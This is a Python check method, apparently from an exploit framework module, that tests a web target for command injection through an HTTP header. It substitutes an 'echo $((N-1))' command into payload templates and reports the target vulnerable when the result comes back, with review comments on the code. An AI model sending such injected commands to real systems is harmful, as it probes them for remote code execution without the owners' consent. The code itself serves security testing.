| 69 | |
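@mute
def check(self):
    """Probe each payload template and report whether the target evaluated it.

    A random arithmetic expression is substituted into every template in
    ``self.payloads`` and sent as the value of the ``self.header`` request
    header. The target is reported as vulnerable when the computed result
    appears in the response body; the template that matched is stored in
    ``self.valid``.

    Returns:
        bool: True if a response contained the expected result, else False.
    """
    # int() drops leading zeros, so a six-character digit string could
    # collapse to a tiny number whose result ("0", "-1", "11", ...) occurs in
    # almost any page and is then reported as a finding. A non-zero first
    # digit keeps the expected result at five digits or more.
    # Assumes utils.random_text returns characters drawn from `alph`; confirm.
    number = int(
        utils.random_text(1, alph="123456789")
        + utils.random_text(5, alph=string.digits)
    )
    solution = str(number - 1)
    cmd = "echo $(({}-1))".format(number)

    # NOTE(review): the marker is substituted into the payload but never
    # looked for in the response. If the templates in self.payloads wrap the
    # command output in the marker (not visible from here), matching the
    # result between markers would be a stricter test than a bare substring.
    marker = utils.random_text(32)
    for payload in self.payloads:
        injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)

        response = self.http_request(
            method=self.method,
            path=self.path,
            headers={self.header: injection},
        )
        if response is None:
            # No response object for this payload; move on to the next one.
            continue

        if solution in response.text:
            self.valid = payload
            return True  # target is vulnerable

    return False  # target not vulnerable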